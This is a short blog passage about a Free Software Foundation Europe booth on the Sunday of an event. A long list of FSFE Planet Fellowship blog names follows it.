Sunday was far more relaxed than the day before. We had time to talk to more people interested in Free Software and exchanged ideas and thoughts with friends from other initiatives. Among many others, I spoke with people from Freifunk, a Pirate Party politician, a tax consultant with digital ambitions, two system administrators, and a trade unionist. But even the nicest day has to end, and after we packed up the whole booth, merchandise and promotion material again, André took the remainders to the Netherlands where they will be presented to the public at FSFE’s T-DOSE booth.

Planet Fellowship (en): RSS 2.0 | Atom | FOAF |

  /127.0.0.?  /var/log/fsfe/flx » planet-en  Albrechts Blog  Alessandro at FSFE » English  Alessandro's blog  Alina Mierlus - Building the Freedom » English  André on Free Software » English  Being Fellow #952 of FSFE » English  Bela's Internship Blog  Bernhard's Blog  Bits from the Basement  Blog of Martin Husovec  Blog » English  Blog – Think. Innovation.  Bobulate  Brian Gough's Notes  Carlo Piana :: Law is Freedom ::  Ciarán's free software notes  Colors of Noise - Entries tagged planetfsfe  Communicating freely  Computer Floss  Daniel Martí's blog  Daniel's FSFE blog  DanielPocock.com - fsfe  David Boddie - Updates (Full Articles)  Don't Panic » English Planet  ENOWITTYNAME  Elena ``of Valhalla''  English Planet – Dreierlei  English – Björn Schießle's Weblog  English – Max's weblog  English — mina86.com  Escape to freedom  FLOSS – Creative Destruction & Me  FSFE Fellowship Vienna » English  FSFE interviews its Fellows  Fellowship News  Florian Snows Blog » en  Frederik Gladhorn (fregl) » FSFE  Free Software & Digital Rights Noosphere  Free Software with a Female touch  Free Software –  Free Software – GLOG  Free Software – hesa's Weblog  Free as LIBRE  Free speech is better than free beer » English  Free, Easy and Others  From Out There  Graeme's notes » Page not found  Green Eggs and Ham  Handhelds, Linux and Heroes  Heiki "Repentinus" Ojasild » English  HennR's FSFE blog  Henri Bergius  Hook’s Humble Homepage  Hugo - FSFE planet  Iain R. Learmonth  Inductive Bias  Jelle Hermsen » English  Jens Lechtenbörger » English  Karsten on Free Software  Losca  Marcus's Blog  Mario Fux  Mark P. Lindhout’s Flamepit  Martin's notes - English  Matej's blog » FSFE  Matthias Kirschner's Web log - fsfe  Myriam's blog  Mäh?  Nice blog  Nico Rikken » fsfe  Nicolas Jean's FSFE blog » English  Norbert Tretkowski  PB's blog » en  Paul Boddie's Free Software-related blog » English  Pressreview  Rekado  Riccardo (ruphy) Iaconelli - blog  Saint's Log  Seravo  Tarin Gamberini  Technology – Intuitionistically Uncertain  The Girl Who Wasn't There » English  The trunk  Thib's Fellowship Blog » fsfe  Thinking out loud » English  Thomas Koch - free software  Thomas Løcke Being Incoherent  Told to blog - Entries tagged fsfe  Tonnerre Lombard  Torsten's FSFE blog » english  Viktor's notes » English  Vitaly Repin. Software engineer's blog  Weblog  Weblog  Weblog  Weblog  Weblog  Weblog  Werner's own blurbs  With/in the FSFE » English  a fellowship ahead  agger's Free Software blog  anna.morris's blog  ayers's blog  bb's blog  blog  drdanzs blog » freesoftware  egnun's blog » FreeSoftware  emergency exit  free software - Bits of Freedom  free software blog  freedom bits  gollo's blog » English  julia.e.klein's blog  marc0s on Free Software  mkesper's blog » English  nikos.roussos - opensource  pichel's blog  polina's blog  rieper|blog » en  softmetz' anglophone Free Software blog  stargrave's blog  the_unconventional's blog » English  things i made  tobias_platen's blog  tolld's blog  vanitasvitae's blog » englisch  wkossen's blog  yahuxo's blog